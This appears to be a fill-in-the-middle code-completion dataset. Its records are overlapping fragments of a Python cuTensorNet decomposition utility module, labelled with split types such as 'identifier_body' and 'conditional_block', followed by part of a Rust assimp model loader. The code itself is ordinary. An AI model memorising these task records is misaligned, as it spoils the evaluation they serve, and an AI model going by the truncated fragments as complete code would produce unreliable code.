# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = | """ | random_line_split |
|
decomposition_utils.py | different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{cutn.TensorSVDConfigAttribute.ALGO_PARAMS}' has been set to {algo_params}.")
def get_svd_info_dict(handle, svd_info):
"""
Parse the information in SVDInfo in a dictionary object.
"""
info = dict()
for key, attr in SVD_INFO_MAP.items():
info[key] = get_svd_config_info_scalar_attr(handle, 'info', svd_info, attr).item()
svd_algorithm = info['algorithm']
algo_status = get_svd_config_info_scalar_attr(handle, 'info', svd_info, cutn.TensorSVDInfoAttribute.ALGO_STATUS, svd_algorithm=svd_algorithm)
info['algorithm'] = SVD_ALGORITHM_MAP_TO_STRING[svd_algorithm]
if algo_status is not None:
for name in algo_status.dtype.names:
key = info['algorithm'] + f'_{name}'
info[key] = algo_status[name].item()
return info
def parse_decompose_operands_options(options, wrapped_operands, allowed_dtype_names=None):
"""
Given initially wrapped tensors and network options, wrap the operands to device and create an internal NetworkOptions object.
If cutensornet library handle is not provided in `options`, one will be created in the internal options.
"""
device_id = utils.get_network_device_id(wrapped_operands)
logger = logging.getLogger() if options.logger is None else options.logger
operands_location = 'cuda'
if device_id is None:
operands_location = 'cpu'
device_id = options.device_id
logger.info(f"Begin transferring input data from host to device {device_id}")
wrapped_operands = tensor_wrapper.to(wrapped_operands, device_id)
logger.info("Input data transfer finished")
# initialize handle once if not provided
if options.handle is not None:
own_handle = False
handle = options.handle
else:
own_handle = True
with utils.device_ctx(device_id):
handle = cutn.create()
dtype_name = utils.get_operands_dtype(wrapped_operands)
if allowed_dtype_names is not None and dtype_name not in allowed_dtype_names:
raise ValueError(f"dtype {dtype_name} not supported")
compute_type = options.compute_type if options.compute_type is not None else typemaps.NAME_TO_COMPUTE_TYPE[dtype_name]
package = utils.get_operands_package(wrapped_operands)
allocator = options.allocator if options.allocator is not None else memory._MEMORY_MANAGER[package](device_id, logger)
internal_options = options.__class__(device_id=device_id,
logger=logger,
handle=handle,
blocking=options.blocking,
compute_type=compute_type,
memory_limit=options.memory_limit,
allocator=allocator)
return wrapped_operands, internal_options, own_handle, operands_location
def allocate_and_set_workspace(handle, allocator, workspace_desc, pref, mem_space, workspace_kind, device_id, stream, stream_ctx, logger, task_name=''):
"""
Allocate and set the workspace in the workspace descriptor.
"""
workspace_size = cutn.workspace_get_memory_size(handle, workspace_desc, pref, mem_space, workspace_kind)
# Allocate and set workspace
if mem_space == cutn.Memspace.DEVICE:
with utils.device_ctx(device_id), stream_ctx:
try:
logger.debug(f"Allocating device memory for {task_name}")
workspace_ptr = allocator.memalloc(workspace_size)
except TypeError as e:
message = "The method 'memalloc' in the allocator object must conform to the interface in the "\
"'BaseCUDAMemoryManager' protocol."
raise TypeError(message) from e
logger.debug(f"Finished allocating device memory of size {formatters.MemoryStr(workspace_size)} for decomposition in the context of stream {stream}.")
device_ptr = utils.get_ptr_from_memory_pointer(workspace_ptr)
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, device_ptr, workspace_size)
logger.debug(f"The workspace memory (device pointer = {device_ptr}) has been set in the workspace descriptor.")
return workspace_ptr
elif workspace_size != 0:
# host workspace
logger.debug(f"Allocating host memory for {task_name}")
workspace_host = numpy.empty(workspace_size, dtype=numpy.int8)
logger.debug(f"Finished allocating host memory of size {formatters.MemoryStr(workspace_size)} for decomposition.")
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, workspace_host.ctypes.data, workspace_size)
logger.debug(f"The workspace memory (host pointer = {workspace_host.ctypes.data}) has been set in the workspace descriptor.")
return workspace_host
else:
return None
def _destroy_tensor_descriptors(desc_tensors):
for t in desc_tensors:
if t is not None:
cutn.destroy_tensor_descriptor(t)
def | create_operands_and_descriptors | identifier_name |
|
decomposition_utils.py | _modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
| logger.info(f"The SVDConfig attribute '{cut | """
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None: | identifier_body |
decomposition_utils.py | _modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
|
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{ | raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}") | conditional_block |
main.rs | Mat4>,
}
#[inline(always)]
fn lerp<S, T: Add<T,T> + Sub<T,T> + Mul<S,T>>(start: T, end: T, s: S) -> T {
return start + (end - start) * s;
}
impl<'a> Model<'a> {
fn from_file(ai_scene: ai::Scene<'a>,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
program: &gfx::ProgramHandle,
state: &gfx::DrawState,
texture_store: &TextureStore,
) -> Model<'a> {
// calculate the space we need to allocate
let mut num_vertices = 0;
let mut num_indices = 0;
for mesh in ai_scene.get_meshes().iter() {
num_vertices += mesh.num_vertices;
num_indices += mesh.num_faces * 3;
}
// prepare the data structures used to store the scene
let mut vertices = Vec::with_capacity(num_vertices as uint);
let mut indices = Vec::with_capacity(num_indices as uint);
// The bone weights and ids. Each vertex may be influenced by upto
// 4 bones
let mut bone_weights: Vec<Vec4> = Vec::from_elem(num_vertices as uint,
[0.0, ..4]);
let mut bone_ids: Vec<IVec4> = Vec::from_elem(num_vertices as uint,
[0, ..4]);
let bone_map = BoneMap::new(&ai_scene);
// stores the first index of each mesh, used for creating batches
let mut start_indices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
let mut materials = Vec::with_capacity(ai_scene.num_materials as uint);
let mut batches = Vec::with_capacity(ai_scene.num_meshes as uint);
| // find the textures used by this model from the list of materials
for mat in ai_scene.get_materials().iter() {
let texture_src = mat.get_texture(ai::material::TextureType::Diffuse,
0
);
match texture_src {
Some(s) => {
match texture_store.textures.get(&s) {
Some(t) => materials.push(t),
None => panic!("couldn't load texture: {}", s),
}
}
None => {
panic!("could read texture name from material: {}", texture_src);
}
}
}
// prepare the data for a format that can be loaded to the gpu
{
start_indices.push(0);
for mesh in ai_scene.get_meshes().iter() {
let vert_id_offset = vertices.len() as u32;
// get all the bone information for this mesh
for bone in mesh.get_bones().iter() {
let bone_id = bone_map.get_id(&bone.name.to_string());
// println!("{}: Bone id and name: {} ===> {}",
// mesh_num, bone_id, bone.name);
let bone_id = match bone_id {
None => panic!("Invaild bone reference"),
Some(id) => id,
};
'next_weight: for vert_weight in bone.get_weights().iter() {
let vertex_id = (vert_id_offset + vert_weight.vertex_id) as uint;
for i in range(0u, 4) {
if bone_ids[vertex_id][i] == 0 {
bone_weights[vertex_id][i] = vert_weight.weight;
bone_ids[vertex_id][i] = bone_id;
continue 'next_weight;
}
}
// assimp should have limited bone weights to 4
unreachable!();
}
}
let verts = mesh.get_vertices();
let norms = mesh.get_normals();
let tex_coords = mesh.get_texture_coords();
// fill up the vertex buffer
for i in range(0u, verts.len()) {
vertices.push( Vertex {
a_position: verts[i].to_array(),
a_normal: norms[i].to_array(),
a_tex_coord: if tex_coords.len() == 0 {
[0.0, 0.0, 0.0]
} else {
// only support 1 texture coord
tex_coords[0][i].to_array()
},
a_bone_weights: bone_weights[i + vert_id_offset as uint],
a_bone_ids: bone_ids[i + vert_id_offset as uint],
});
}
// fill up the index buffer
for face in mesh.get_faces().iter() {
let face_indices = face.get_indices();
assert!(face_indices.len() == 3);
indices.push(face_indices[0] + vert_id_offset);
indices.push(face_indices[1] + vert_id_offset);
indices.push(face_indices[2] + vert_id_offset);
}
start_indices.push(indices.len() as u32);
}
}
// create the vertex and index buffers
// generate the batches used to draw the object
{
let vert_buf = graphics.device.create_mesh(vertices.as_slice());
